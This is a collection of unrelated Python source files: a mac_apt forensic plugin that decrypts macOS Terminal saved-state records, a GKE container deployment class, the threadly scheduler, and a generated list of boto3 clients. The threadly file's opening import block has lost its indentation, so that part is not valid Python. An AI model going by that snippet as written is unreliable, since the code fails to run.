                    title = v
                elif k == 'TTWindowState':
                    window_settings = v.get('Window Settings', None)
                    if not window_settings: continue
                    for w in window_settings:
                        for key, value in w.items():
                            if key in ('Tab Contents', 'Tab Contents v2'):
                                # Content lines arrive as raw bytes; collect them all.
                                for content in value:
                                    if isinstance(content, bytes):
                                        contents += content.decode('utf8', 'backslashreplace')
                            elif key in ('Tab Working Directory URL String', 'Tab Working Directory URL'):
                                working_dir = value
    except ValueError as ex:
        log.error("Error reading terminal plist, error was: {}".format(str(ex)))
    return (title, working_dir, contents)
def ProcessFile(windows_plist_file_path, data_file_path, terminals):
    '''Parse one windows.plist / data.data pair (standalone mode) and append
    recovered terminal windows to `terminals`.'''
    success, windows_plist, error = CommonFunctions.ReadPlist(windows_plist_file_path)
    if not success:
        log.error(f"Error reading plist - {windows_plist_file_path}. Error={error}")
        return
    with open(data_file_path, 'rb') as f:
        all_data = f.read()  # Should be a small file
    Process(windows_plist, all_data, terminals, '', data_file_path)
def AddUnique(terminal_info, terminals):
    '''Append terminal_info to terminals unless an entry with identical
    source, user, working dir, content and title already exists.'''
    for existing in terminals:
        same = (existing.source == terminal_info.source
                and existing.user == terminal_info.user
                and existing.working_dir == terminal_info.working_dir
                and existing.content == terminal_info.content
                and existing.title == terminal_info.title)
        if same:
            return  # duplicate -- drop it
    terminals.append(terminal_info)
def Process(windows_plist, all_data, terminals, user, data_source):
    '''Walk the NSCR1000 records in data.data, decrypt each window's blob with
    the per-window key from windows.plist and collect terminal window info.'''
    # Saved-state records are encrypted AES-CBC with an all-zero 16-byte IV.
    iv = struct.pack("<IIII", 0, 0, 0, 0)
    if windows_plist:
        pos = 0
        # Parsing data.data
        size_data = len(all_data)
        while (pos + 16) < size_data:
            # Record header: 8-byte magic ("NSCR1000"), then big-endian
            # 4-byte window id and 4-byte total record length (header included).
            magic = all_data[pos:pos+8]
            ns_window_id, rec_length = struct.unpack(">II", all_data[pos+8:pos+16])
            pos += 16
            rec_length -= 16
            if (pos + rec_length) <= size_data:
                enc_data = all_data[pos:pos + rec_length]
                if magic != b"NSCR1000":
                    # Logged but not fatal: we still try to decrypt the payload.
                    log.error("Unknown header:" + str(magic))
                key = get_key_for_window_id(windows_plist, ns_window_id)
                if key:
                    dec_data = decrypt(enc_data, key, iv)
                    data_name, new_data = get_decoded_plist_data(dec_data)
                    if new_data and data_name == b'_NSWindow':
                        title, working_dir, contents = ParseTerminalPlist_NSWindow(new_data)
                        # Keep only windows that produced at least one field.
                        if not(len(contents) == 0 and len(working_dir) == 0 and len(title) == 0):
                            t = TerminalWindowInfo(title, working_dir, contents, user, data_source)
                            #terminals.append(t)
                            AddUnique(t, terminals)
                else:
                    # NOTE(review): uses print() where the rest of the module uses
                    # the 'log' logger -- likely should be log.warning; confirm.
                    print('key not found for window_id={}'.format(ns_window_id))
            pos += rec_length
def Plugin_Start(mac_info):
    '''Main Entry point function for plugin.
    Iterates every user's Saved Application State folder, exports and parses
    the Terminal windows.plist/data.data pair, then writes the results out.'''
    processed_paths = []
    terminals = []
    saved_state_path = '{}/Library/Saved Application State/com.apple.Terminal.savedState'
    for user in mac_info.users:
        if user.home_dir == '/private/var/empty': continue # Optimization, nothing should be here!
        elif user.home_dir == '/private/var/root': user_name = 'root' # Some other users use the same root folder, we will list all such users as 'root', as there is no way to tell
        # NOTE(review): 'user_name' assigned above is never read -- later code uses
        # user.user_name, so the 'root' aliasing appears to have no effect; confirm.
        if user.home_dir in processed_paths: continue # Avoid processing same folder twice (some users have same folder! (Eg: root & daemon))
        processed_paths.append(user.home_dir)
        source_path = saved_state_path.format(user.home_dir)
        windows_plist_path = source_path + '/windows.plist'
        data_path = source_path + '/data.data'
        if mac_info.IsValidFolderPath(source_path) and mac_info.IsValidFilePath(windows_plist_path) and mac_info.IsValidFilePath(data_path):
            # Export the artifacts for preservation before parsing them.
            mac_info.ExportFile(windows_plist_path, __Plugin_Name, user.user_name + "_", False)
            mac_info.ExportFile(data_path, __Plugin_Name, user.user_name + "_", False)
            success, windows_plist, error = mac_info.ReadPlist(windows_plist_path)
            if success:
                try:
                    all_data_file = mac_info.Open(data_path)
                    if (all_data_file):
                        all_data = all_data_file.read()
                        Process(windows_plist, all_data, terminals, user.user_name, data_path)
                    else:
                        log.error('Failed to open data.data file - {}'.format(data_path))
                except (ValueError, OSError):
                    log.exception('')
            else:
                log.error('Failed to open windows.plist: {}'.format(windows_plist_path))
    if len(terminals) > 0:
        PrintAll(terminals, mac_info.output_params)
    else:
        log.info('No Terminal saved state found')
def Plugin_Start_Standalone(input_files_list, output_params):
    '''Main entry point function when used on single artifacts (mac_apt_singleplugin), not on a full disk image'''
    log.info("Module Started as standalone")
    terminals = []
    for input_path in input_files_list:
        log.debug("Input folder passed was: " + input_path)
        # Each input must be the com.apple.Terminal.savedState folder itself.
        if not os.path.isdir(input_path):
            log.error('Input path "{}" is not a folder. Provide the input path to folder com.apple.Terminal.savedState'.format(input_path))
            continue
        ProcessFile(os.path.join(input_path, 'windows.plist'),
                    os.path.join(input_path, 'data.data'),
                    terminals)
    if terminals:
        PrintAll(terminals, output_params)
    else:
        log.info('No Terminal saved state found')
def Plugin_Start_Ios(ios_info):
    '''Entry point for ios_apt plugin'''
    # Terminal saved state is a macOS-only artifact; nothing to do on iOS.
    pass
if __name__ == '__main__':
    print ("This plugin is a part of a framework and does not run independently on its own!")
| |
import ast
import os
from os.path import expanduser
import shutil
import time
import yaml
from kubernetes import client, config
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from server.common import constants
from server.common import common_functions
from server.common import docker_lib
from server.common import exceptions
from server.common import fm_logger
from server.dbmodule.objects import app as app_db
from server.dbmodule.objects import environment as env_db
from server.dbmodule.objects import resource as res_db
import server.server_plugins.app_base as app_base
import gke_app_base
from server.server_plugins.gcloud import gcloud_helper
home_dir = expanduser("~")
APP_AND_ENV_STORE_PATH = ("{home_dir}/.cld/data/deployments/").format(home_dir=home_dir)
fmlogger = fm_logger.Logging()
GCR = "us.gcr.io"
class GKEMultiContainer(gke_app_base.GKEAppBase):
    """Deploys, deletes and fetches logs for multi-container applications
    (defined via Kubernetes YAML) on Google Kubernetes Engine."""
    gcloudhelper = gcloud_helper.GCloudHelper()
    def __init__(self):
        credentials = GoogleCredentials.get_application_default()
        self.gke_service = discovery.build('container', 'v1',
                                           credentials=credentials)
        self.compute_service = discovery.build('compute', 'v1',
                                               credentials=credentials,
                                               cache_discovery=False)
        self.docker_handler = docker_lib.DockerLib()
        self.app_yaml_def = ''
    def _check_if_pod_or_more(self, app_id, app_info):
        """Return True when the app's Kubernetes YAML defines only Pod objects
        (no Service/Deployment), which selects the simple pod deploy path."""
        kind_list = []
        app_dir = app_info['app_location']
        app_folder_name = app_info['app_folder_name']
        df_dir = app_dir + "/" + app_folder_name
        app_yaml = app_info['app_yaml']
        # Use a context manager so the file handle is released (the original
        # leaked it); materialize the generator before the stream closes.
        with open(df_dir + "/" + app_yaml, "r") as stream:
            # NOTE(review): yaml.load_all without an explicit Loader is unsafe on
            # untrusted input (and warns on PyYAML >= 5.1); confirm the YAML is
            # trusted or switch to yaml.safe_load_all.
            docs = list(yaml.load_all(stream))
        for doc in docs:
            for k, v in doc.items():
                if k == 'kind':
                    kind_list.append(v.strip())
        only_pod = not ('Service' in kind_list or 'Deployment' in kind_list)
        return only_pod
    def _get_pod_name(self, app_info):
        """Return the pod name declared in the app YAML's metadata section."""
        app_yaml = common_functions.read_app_yaml(app_info)
        pod_name = app_yaml['metadata']['name']
        return pod_name
    def _get_container_port(self, app_info):
        """Scan the app YAML for the first 'containerPort:' value; '' if absent."""
        container_port = ''
        app_dir = app_info['app_location']
        app_folder_name = app_info['app_folder_name']
        app_yaml_dir = app_dir + "/" + app_folder_name
        app_yaml = app_info['app_yaml']
        app_yaml_file = app_yaml_dir + "/" + app_yaml
        # Context manager fixes the file-handle leak in the original code.
        with open(app_yaml_file, "r") as fp:
            for line in fp.readlines():
                if line.find("containerPort") >= 0:
                    parts = line.split("containerPort:")
                    container_port = parts[1].strip()
                    break
        return container_port
    def _deploy_pod(self, app_id, app_info):
        """Build a deploy image that runs 'kubectl create' + 'kubectl expose'
        for a single pod, then record the app URL/status in the app db."""
        df_file = self._get_kube_df_file(app_info)
        app_data = {}
        kubernetes_yaml = app_info['app_yaml']
        pod_name = self._get_pod_name(app_info)
        service_name = pod_name
        container_port = self._get_container_port(app_info)
        if not container_port:
            container_port = 80  # default HTTP port when the YAML declares none
        df_file = df_file + ("\n"
                             "WORKDIR /src \n"
                             "RUN kubectl create -f {kubernetes_yaml} \ \n"
                             " && kubectl expose pod {pod_name} --name {service_name} --type LoadBalancer --port 80 --target-port={container_port} --protocol TCP").format(
            kubernetes_yaml=kubernetes_yaml,
            pod_name=pod_name,
            service_name=service_name,
            container_port=container_port
        )
        cont_name = app_info['app_name'] + "-deploy"
        app_dir = app_info['app_location']
        app_folder_name = app_info['app_folder_name']
        df_dir = app_dir + "/" + app_folder_name
        df_name = df_dir + "/Dockerfile.deploy"
        with open(df_name, "w") as fp:
            fp.write(df_file)
        err, output = self.docker_handler.build_container_image(
            cont_name,
            df_name,
            df_context=df_dir
        )
        if err:
            error_output = common_functions.filter_error_output(output)
            error_msg = ("Error encountered in building Dockerfile.deploy {e}").format(e=err)
            error_msg = error_msg + " " + error_output
            fmlogger.error(error_msg)
            raise exceptions.AppDeploymentFailure(error_msg)
        app_details = {}
        app_url, status = self._check_if_app_is_ready(app_id,
                                                      service_name,
                                                      app_details)
        app_data['status'] = status
        app_details['app_url'] = app_url
        app_details['pod_name'] = [pod_name]
        app_details['service_name'] = service_name
        app_details['app_folder_name'] = app_info['app_folder_name']
        app_details['env_name'] = app_info['env_name']
        app_data['output_config'] = str(app_details)
        app_db.App().update(app_id, app_data)
        self.docker_handler.remove_container_image(cont_name)
    def _deploy_service(self, app_id, app_info):
        """Record that YAMLs defining Service/Deployment objects are unsupported."""
        # BUG FIX: 'app_data' was referenced without being initialized, which
        # raised NameError instead of recording the unsupported-format status.
        app_data = {}
        app_data['status'] = 'File format not supported. Check https://github.com/cloud-ark/cloudark/issues/200'
        app_db.App().update(app_id, app_data)
    def _deploy(self, app_id, app_info):
        """Dispatch to pod-only or service deployment based on the YAML contents."""
        only_pod_defined = self._check_if_pod_or_more(app_id, app_info)
        if only_pod_defined:
            self._deploy_pod(app_id, app_info)
        else:
            self._deploy_service(app_id, app_info)
    def deploy_application(self, app_id, app_info):
        """Top-level deploy flow: kube config setup, environment resolution,
        then the actual deployment; status is tracked in the app db throughout."""
        fmlogger.debug("Deploying application %s" % app_info['app_name'])
        self._copy_creds(app_info)
        app_data = {}
        app_data['status'] = 'setting-up-kubernetes-config'
        app_db.App().update(app_id, app_data)
        try:
            self._setup_kube_config(app_info)
        except Exception as e:
            # NOTE(review): deployment proceeds even after a kube-config failure;
            # presumably intentional (the status records the error) -- confirm.
            fmlogger.error("Exception encountered in obtaining kube config %s" % e)
            app_db.App().update(app_id, {'status': str(e)})
        # Resolve environment
        common_functions.resolve_environment_multicont(app_id, app_info)
        app_data = {}
        app_data['status'] = 'deploying'
        app_db.App().update(app_id, app_data)
        try:
            self._deploy(app_id, app_info)
            fmlogger.debug("Done deploying application %s" % app_info['app_name'])
        except exceptions.AppDeploymentFailure as e:
            fmlogger.error(str(e))
            app_data['status'] = 'deployment-failed ' + str(e) + " " + e.get_message()
            app_db.App().update(app_id, app_data)
    def redeploy_application(self, app_id, app_info):
        """Redeploy is not implemented for GKE multi-container apps."""
        pass
    def delete_application(self, app_id, app_info):
        """Delete the app's service and pods, then remove its db record.
        Cleanup is best-effort: the record is deleted even if teardown fails."""
        fmlogger.debug("Deleting application %s" % app_info['app_name'])
        app_obj = app_db.App().get(app_id)
        try:
            app_output_config = ast.literal_eval(app_obj.output_config)
            self._delete_service(app_info, app_output_config['service_name'])
            pod_name_list = app_output_config['pod_name']
            for pod in pod_name_list:
                self._delete_pod(app_info, pod)
        except Exception as e:
            fmlogger.error(e)
        app_db.App().delete(app_id)
        fmlogger.debug("Done deleting application %s" % app_info['app_name'])
    def get_logs(self, app_id, app_info):
        """Collect and return log file paths for every pod of this app."""
        fmlogger.debug("Retrieving logs for application %s %s" % (app_id, app_info['app_name']))
        app_obj = app_db.App().get(app_id)
        output_config = ast.literal_eval(app_obj.output_config)
        pod_name_list = output_config['pod_name']
        log_list = []
        for pod in pod_name_list:
            logs_path_list = self._retrieve_logs(app_info, pod, app_name=app_info['app_name'])
            log_list.extend(logs_path_list)
        return log_list
| |
"""
threadly a simple threadpool and scheduler for python.
"""
import threading
import logging
try:
from Queue import Queue
from Queue import Empty as EmptyException
except:
from queue import Queue, Empty as EmptyException
from threadly.Structures import SortedLockingList
from threadly.KeyedExecutor import KeyedExecutor
from threadly.Futures import ListenableFuture
from threadly.Futures import future_job
from threadly.Clock import Clock
# Py2/Py3 compatibility: Python 3 has no 'xrange', so alias it to 'range'.
try:
    xrange(1)
except:
    xrange = range
class Scheduler(object):
    """
    Main Scheduler Object.
    A fixed-size thread pool fed by one main Queue; delayed/recurring tasks
    wait in a sorted list and are promoted onto the main queue when due.
    """
    def __init__(self, poolsize):
        """
        Construct a Scheduler instance with the set thread pool size.
        `poolsize` positive integer for the number of threads you want
        in this pool.
        """
        self.__log = logging.getLogger("root.threadly")
        self.__clock = Clock()
        self.__key_lock = threading.Condition()
        self.__poolsize = poolsize
        self.__running = True
        self.__in_shutdown = False
        self.__main_queue = Queue()
        # Delayed tasks sorted by absolute run time (milliseconds).
        self.__delayed_tasks = SortedLockingList()
        self.__in_delay = False
        self.__threads = list()
        self.__delay_lock = threading.Condition()
        # Maps a user key to the KeyedExecutor that serializes its tasks.
        self.__keys = dict()
        # Workers are daemon threads so they never block interpreter exit.
        for i in xrange(self.__poolsize):
            tmp_thread = threading.Thread(target=self.__thread_pool)
            tmp_thread.name = "Executor-Pool-Thread-%d" % (i)
            tmp_thread.daemon = True
            tmp_thread.start()
            self.__threads.append(tmp_thread)
    def get_poolsize(self):
        """
        Returns the number of threads used in this Pool.
        """
        return len(self.__threads)
    def get_queue_size(self):
        """
        Returns the number of items currently awaiting Execution.
        """
        return self.__main_queue.qsize()
    def execute(self, task, args=None, kwargs=None):
        """
        Execute a given task as soon as possible.
        `task` is a callable to be called on the Scheduler.
        `args` are the arguments to pass to the callable when called.
        `kwargs` are the keyword args to be passed to the callable when called.
        """
        args = args or ()
        kwargs = kwargs or {}
        self.schedule(task, args=args, kwargs=kwargs)
    def schedule_with_future(self, task, delay=0, key=None, args=None, kwargs=None):
        """
        Returns a `ListenableFuture` for this task.  Once the task is
        completed the future will also be completed.  This works pretty much
        exactly like `schedule` except you can not make a task recurring.
        `task` is a callable to be called on the Scheduler.
        `delay` this is the time to wait (in milliseconds!!) before scheduler
        will call the passed task.
        `key` this is any python object to use as a key.  All tasks using
        this key will be ran in a single threaded manor.
        `args` are the arguments to pass to the callable when called.
        `kwargs` are the keyword args to be passed to the callable when called.
        """
        args = args or ()
        kwargs = kwargs or {}
        job = (task, args, kwargs)
        future = ListenableFuture()
        # future_job runs the wrapped job and completes the future with its result.
        self.schedule(future_job, delay=delay, key=key, args=(future, job))
        return future
    def schedule(self, task, delay=0, recurring=False, key=None, args=None, kwargs=None):
        """
        This schedules a task to be executed.  It can be delayed, and set
        to a key.  It can also be marked as recurring.
        `task` is a callable to be called on the Scheduler.
        `delay` this is the time to wait (in milliseconds!!) before scheduler
        will call the passed task.
        `recurring` set this to True if this should be a recurring.
        You should be careful that delay is > 0 when setting this to True.
        `key` this is any python object to use as a key.  All tasks using this
        key will be ran in a single threaded manor.
        `args` are the arguments to pass to the callable when called.
        `kwargs` are the keyword args to be passed to the callable when called.
        """
        args = args or ()
        kwargs = kwargs or {}
        if delay > 0:
            # Absolute due time in milliseconds.
            s_task = int(self.__clock.accurate_time() * 1000) + delay
            send = False
            # If this task is due sooner than anything queued, wake a worker so
            # it re-evaluates its wait time.
            if delay / 1000.0 <= self.__get_next_wait_time():
                send = True
            self.__delayed_tasks.add((s_task, task, delay, recurring, key, args, kwargs))
            if send:
                self.__main_queue.put((self.__empty, (), {}))
        else:
            if key is not None:
                # Lazily create the per-key executor that serializes key'd tasks.
                self.__key_lock.acquire()
                if key not in self.__keys:
                    tmp = KeyedExecutor()
                    self.__keys[key] = tmp
                self.__key_lock.release()
                run_key = self.__keys[key]
                run_key.add((task, args, kwargs))
                run_key.lock.acquire()
                # Only enqueue the key runner once at a time; run_all drains it.
                if not run_key.in_queue and run_key.size() > 0:
                    run_key.in_queue = True
                    self.__main_queue.put((run_key.run_all, (), {}))
                run_key.lock.release()
            else:
                self.__main_queue.put((task, args, kwargs))
    def remove(self, task):
        """
        Remove a scheduled task from the queue.  This is a best effort remove,
        the task could still possibly run.  This is most useful to cancel
        recurring tasks.  If there is more than one task with this callable
        scheduled only the first one is removed.
        `task` callable task to remove from the scheduled tasks list.
        """
        count = 0
        found = False
        # Index 1 of a delayed-task tuple is the callable itself.
        for tasks in self.__delayed_tasks.safeIterator():
            if tasks[1] == task:
                found = True
                break
            else:
                count += 1
        if found:
            self.__delayed_tasks.pop(count)
            return True
        return False
    def shutdown(self):
        """
        Shuts down the threadpool.  Any task currently on the queue will be
        ran, but all Scheduled tasks will removed and no more tasks can be
        added.
        """
        self.__running = False
        self.__delayed_tasks.clear()
        # shutdown_now is queued behind any pending work, so it runs last.
        return self.schedule_with_future(self.shutdown_now)
    def shutdown_now(self):
        """
        Shuts down the threadpool.  Any task currently being executed will
        still complete, but the queue will be emptied out.
        """
        self.__running = False
        self.__delayed_tasks.clear()
        while not self.__main_queue.empty():
            try:
                self.__main_queue.get_nowait()
            except:
                pass
        self.__internal_shutdown()
    def __internal_shutdown(self):
        # Wake every worker so each one notices __running is False and exits;
        # the no-op tasks act purely as wake-up sentinels.
        self.__running = False
        for tmp_thread in self.__threads:
            if tmp_thread is not None and tmp_thread.is_alive() and threading is not None and tmp_thread != threading.current_thread():
                self.__main_queue.put((self.__empty, (), {}))
                self.__main_queue.put((self.__empty, (), {}))
                self.__main_queue.put((self.__empty, (), {}))
                self.__main_queue.put((self.__empty, (), {}))
    def __empty(self):
        # No-op task used only to wake worker threads blocked on the queue.
        pass
    def __get_next_wait_time(self):
        # Seconds until the earliest delayed task is due; 3600 when none exist.
        tmp = self.__delayed_tasks.peek()
        if tmp is None or self.__delayed_tasks.size() == 0:
            return 3600
        else:
            task = tmp[0] - int(self.__clock.accurate_time() * 1000)
            # Small fudge factor so workers wake slightly before the due time.
            return (task / 1000.0) - .0005
    def __check_delay_queue(self):
        # Promote every due delayed task onto the main queue; returns whether
        # we won the delayed-list lock (only one worker drains it at a time).
        dl = self.__delayed_tasks.lock()
        if dl:
            try:
                time_out = self.__get_next_wait_time()
                while time_out <= 0:
                    run_task = self.__delayed_tasks.pop(0)
                    self.schedule(run_task[1], key=run_task[4], args=run_task[5], kwargs=run_task[6])
                    #run_task[3] is recurring, if so we add again as a scheduled event
                    if run_task[3] == True and not self.__in_shutdown:
                        self.schedule(run_task[1], run_task[2], run_task[3], run_task[4], run_task[5], run_task[6])
                    time_out = self.__get_next_wait_time()
            finally:
                self.__delayed_tasks.unlock()
        return dl
    def __thread_pool(self):
        # Worker loop: drain due delayed tasks, then block on the main queue
        # (bounded by the next delayed-task due time) and run what arrives.
        while self.__running:
            try:
                runner = None
                time_out = self.__get_next_wait_time()
                if time_out <= 0 and self.__check_delay_queue():
                    time_out = self.__get_next_wait_time()
                if time_out <= 0:
                    time_out = 5
                runner = self.__main_queue.get(True, time_out)
                if runner is not None:
                    runner[0](*runner[1], **runner[2])
            except IndexError as exp:
                # Raised when another worker popped the delayed task first.
                pass
            except EmptyException as exp:
                # Queue wait timed out; loop around and re-check delayed tasks.
                pass
            except Exception as exp:
                if runner is not None:
                    self.__log.error("Exception while Executing function:\"{}\" with args:\"{}\" and kwargs:\"{}\"".format(runner[0].__name__, runner[1],runner[2]))
                self.__log.exception(exp)
| |
# Auto-generated convenience module: instantiates a boto3 client for every
# AWS service and tags each with a ``:type :`` docstring so IDEs resolve the
# matching pyboto3 stub for autocompletion. The bare-string lines are no-ops
# at runtime; they exist purely for static tooling.
import boto3
accessanalyzer = boto3.client("accessanalyzer")
""":type : pyboto3.accessanalyzer"""
acm = boto3.client("acm")
""":type : pyboto3.acm"""
acm_pca = boto3.client("acm-pca")
""":type : pyboto3.acm_pca"""
alexaforbusiness = boto3.client("alexaforbusiness")
""":type : pyboto3.alexaforbusiness"""
amplify = boto3.client("amplify")
""":type : pyboto3.amplify"""
apigateway = boto3.client("apigateway")
""":type : pyboto3.apigateway"""
apigatewaymanagementapi = boto3.client("apigatewaymanagementapi")
""":type : pyboto3.apigatewaymanagementapi"""
apigatewayv2 = boto3.client("apigatewayv2")
""":type : pyboto3.apigatewayv2"""
appconfig = boto3.client("appconfig")
""":type : pyboto3.appconfig"""
application_autoscaling = boto3.client("application-autoscaling")
""":type : pyboto3.application_autoscaling"""
application_insights = boto3.client("application-insights")
""":type : pyboto3.application_insights"""
appmesh = boto3.client("appmesh")
""":type : pyboto3.appmesh"""
appstream = boto3.client("appstream")
""":type : pyboto3.appstream"""
appsync = boto3.client("appsync")
""":type : pyboto3.appsync"""
athena = boto3.client("athena")
""":type : pyboto3.athena"""
autoscaling = boto3.client("autoscaling")
""":type : pyboto3.autoscaling"""
autoscaling_plans = boto3.client("autoscaling-plans")
""":type : pyboto3.autoscaling_plans"""
backup = boto3.client("backup")
""":type : pyboto3.backup"""
batch = boto3.client("batch")
""":type : pyboto3.batch"""
budgets = boto3.client("budgets")
""":type : pyboto3.budgets"""
ce = boto3.client("ce")
""":type : pyboto3.ce"""
chime = boto3.client("chime")
""":type : pyboto3.chime"""
cloud9 = boto3.client("cloud9")
""":type : pyboto3.cloud9"""
clouddirectory = boto3.client("clouddirectory")
""":type : pyboto3.clouddirectory"""
cloudformation = boto3.client("cloudformation")
""":type : pyboto3.cloudformation"""
cloudfront = boto3.client("cloudfront")
""":type : pyboto3.cloudfront"""
cloudhsm = boto3.client("cloudhsm")
""":type : pyboto3.cloudhsm"""
cloudhsmv2 = boto3.client("cloudhsmv2")
""":type : pyboto3.cloudhsmv2"""
cloudsearch = boto3.client("cloudsearch")
""":type : pyboto3.cloudsearch"""
cloudsearchdomain = boto3.client("cloudsearchdomain")
""":type : pyboto3.cloudsearchdomain"""
cloudtrail = boto3.client("cloudtrail")
""":type : pyboto3.cloudtrail"""
cloudwatch = boto3.client("cloudwatch")
""":type : pyboto3.cloudwatch"""
codebuild = boto3.client("codebuild")
""":type : pyboto3.codebuild"""
codecommit = boto3.client("codecommit")
""":type : pyboto3.codecommit"""
codedeploy = boto3.client("codedeploy")
""":type : pyboto3.codedeploy"""
codeguru_reviewer = boto3.client("codeguru-reviewer")
""":type : pyboto3.codeguru_reviewer"""
codeguruprofiler = boto3.client("codeguruprofiler")
""":type : pyboto3.codeguruprofiler"""
codepipeline = boto3.client("codepipeline")
""":type : pyboto3.codepipeline"""
codestar = boto3.client("codestar")
""":type : pyboto3.codestar"""
codestar_connections = boto3.client("codestar-connections")
""":type : pyboto3.codestar_connections"""
codestar_notifications = boto3.client("codestar-notifications")
""":type : pyboto3.codestar_notifications"""
cognito_identity = boto3.client("cognito-identity")
""":type : pyboto3.cognito_identity"""
cognito_idp = boto3.client("cognito-idp")
""":type : pyboto3.cognito_idp"""
cognito_sync = boto3.client("cognito-sync")
""":type : pyboto3.cognito_sync"""
comprehend = boto3.client("comprehend")
""":type : pyboto3.comprehend"""
comprehendmedical = boto3.client("comprehendmedical")
""":type : pyboto3.comprehendmedical"""
compute_optimizer = boto3.client("compute-optimizer")
""":type : pyboto3.compute_optimizer"""
config = boto3.client("config")
""":type : pyboto3.config"""
connect = boto3.client("connect")
""":type : pyboto3.connect"""
connectparticipant = boto3.client("connectparticipant")
""":type : pyboto3.connectparticipant"""
cur = boto3.client("cur")
""":type : pyboto3.cur"""
dataexchange = boto3.client("dataexchange")
""":type : pyboto3.dataexchange"""
datapipeline = boto3.client("datapipeline")
""":type : pyboto3.datapipeline"""
datasync = boto3.client("datasync")
""":type : pyboto3.datasync"""
dax = boto3.client("dax")
""":type : pyboto3.dax"""
detective = boto3.client("detective")
""":type : pyboto3.detective"""
devicefarm = boto3.client("devicefarm")
""":type : pyboto3.devicefarm"""
directconnect = boto3.client("directconnect")
""":type : pyboto3.directconnect"""
discovery = boto3.client("discovery")
""":type : pyboto3.discovery"""
dlm = boto3.client("dlm")
""":type : pyboto3.dlm"""
dms = boto3.client("dms")
""":type : pyboto3.dms"""
docdb = boto3.client("docdb")
""":type : pyboto3.docdb"""
ds = boto3.client("ds")
""":type : pyboto3.ds"""
dynamodb = boto3.client("dynamodb")
""":type : pyboto3.dynamodb"""
dynamodbstreams = boto3.client("dynamodbstreams")
""":type : pyboto3.dynamodbstreams"""
ebs = boto3.client("ebs")
""":type : pyboto3.ebs"""
ec2 = boto3.client("ec2")
""":type : pyboto3.ec2"""
ec2_instance_connect = boto3.client("ec2-instance-connect")
""":type : pyboto3.ec2_instance_connect"""
ecr = boto3.client("ecr")
""":type : pyboto3.ecr"""
ecs = boto3.client("ecs")
""":type : pyboto3.ecs"""
efs = boto3.client("efs")
""":type : pyboto3.efs"""
eks = boto3.client("eks")
""":type : pyboto3.eks"""
elastic_inference = boto3.client("elastic-inference")
""":type : pyboto3.elastic_inference"""
elasticache = boto3.client("elasticache")
""":type : pyboto3.elasticache"""
elasticbeanstalk = boto3.client("elasticbeanstalk")
""":type : pyboto3.elasticbeanstalk"""
elastictranscoder = boto3.client("elastictranscoder")
""":type : pyboto3.elastictranscoder"""
elb = boto3.client("elb")
""":type : pyboto3.elb"""
elbv2 = boto3.client("elbv2")
""":type : pyboto3.elbv2"""
emr = boto3.client("emr")
""":type : pyboto3.emr"""
es = boto3.client("es")
""":type : pyboto3.es"""
events = boto3.client("events")
""":type : pyboto3.events"""
firehose = boto3.client("firehose")
""":type : pyboto3.firehose"""
fms = boto3.client("fms")
""":type : pyboto3.fms"""
forecast = boto3.client("forecast")
""":type : pyboto3.forecast"""
forecastquery = boto3.client("forecastquery")
""":type : pyboto3.forecastquery"""
frauddetector = boto3.client("frauddetector")
""":type : pyboto3.frauddetector"""
fsx = boto3.client("fsx")
""":type : pyboto3.fsx"""
gamelift = boto3.client("gamelift")
""":type : pyboto3.gamelift"""
glacier = boto3.client("glacier")
""":type : pyboto3.glacier"""
globalaccelerator = boto3.client("globalaccelerator")
""":type : pyboto3.globalaccelerator"""
glue = boto3.client("glue")
""":type : pyboto3.glue"""
greengrass = boto3.client("greengrass")
""":type : pyboto3.greengrass"""
groundstation = boto3.client("groundstation")
""":type : pyboto3.groundstation"""
guardduty = boto3.client("guardduty")
""":type : pyboto3.guardduty"""
health = boto3.client("health")
""":type : pyboto3.health"""
iam = boto3.client("iam")
""":type : pyboto3.iam"""
imagebuilder = boto3.client("imagebuilder")
""":type : pyboto3.imagebuilder"""
importexport = boto3.client("importexport")
""":type : pyboto3.importexport"""
inspector = boto3.client("inspector")
""":type : pyboto3.inspector"""
iot = boto3.client("iot")
""":type : pyboto3.iot"""
iot_data = boto3.client("iot-data")
""":type : pyboto3.iot_data"""
iot_jobs_data = boto3.client("iot-jobs-data")
""":type : pyboto3.iot_jobs_data"""
iot1click_devices = boto3.client("iot1click-devices")
""":type : pyboto3.iot1click_devices"""
iot1click_projects = boto3.client("iot1click-projects")
""":type : pyboto3.iot1click_projects"""
iotanalytics = boto3.client("iotanalytics")
""":type : pyboto3.iotanalytics"""
iotevents = boto3.client("iotevents")
""":type : pyboto3.iotevents"""
iotevents_data = boto3.client("iotevents-data")
""":type : pyboto3.iotevents_data"""
iotsecuretunneling = boto3.client("iotsecuretunneling")
""":type : pyboto3.iotsecuretunneling"""
iotsitewise = boto3.client("iotsitewise")
""":type : pyboto3.iotsitewise"""
iotthingsgraph = boto3.client("iotthingsgraph")
""":type : pyboto3.iotthingsgraph"""
kafka = boto3.client("kafka")
""":type : pyboto3.kafka"""
kendra = boto3.client("kendra")
""":type : pyboto3.kendra"""
kinesis = boto3.client("kinesis")
""":type : pyboto3.kinesis"""
kinesis_video_archived_media = boto3.client("kinesis-video-archived-media")
""":type : pyboto3.kinesis_video_archived_media"""
kinesis_video_media = boto3.client("kinesis-video-media")
""":type : pyboto3.kinesis_video_media"""
kinesis_video_signaling = boto3.client("kinesis-video-signaling")
""":type : pyboto3.kinesis_video_signaling"""
kinesisanalytics = boto3.client("kinesisanalytics")
""":type : pyboto3.kinesisanalytics"""
kinesisanalyticsv2 = boto3.client("kinesisanalyticsv2")
""":type : pyboto3.kinesisanalyticsv2"""
kinesisvideo = boto3.client("kinesisvideo")
""":type : pyboto3.kinesisvideo"""
kms = boto3.client("kms")
""":type : pyboto3.kms"""
lakeformation = boto3.client("lakeformation")
""":type : pyboto3.lakeformation"""
lambda_ = boto3.client("lambda")
""":type : pyboto3.lambda_"""
lex_models = boto3.client("lex-models")
""":type : pyboto3.lex_models"""
lex_runtime = boto3.client("lex-runtime")
""":type : pyboto3.lex_runtime"""
license_manager = boto3.client("license-manager")
""":type : pyboto3.license_manager"""
lightsail = boto3.client("lightsail")
""":type : pyboto3.lightsail"""
logs = boto3.client("logs")
""":type : pyboto3.logs"""
machinelearning = boto3.client("machinelearning")
""":type : pyboto3.machinelearning"""
macie = boto3.client("macie")
""":type : pyboto3.macie"""
macie2 = boto3.client("macie2")
""":type : pyboto3.macie2"""
managedblockchain = boto3.client("managedblockchain")
""":type : pyboto3.managedblockchain"""
marketplace_catalog = boto3.client("marketplace-catalog")
""":type : pyboto3.marketplace_catalog"""
marketplace_entitlement = boto3.client("marketplace-entitlement")
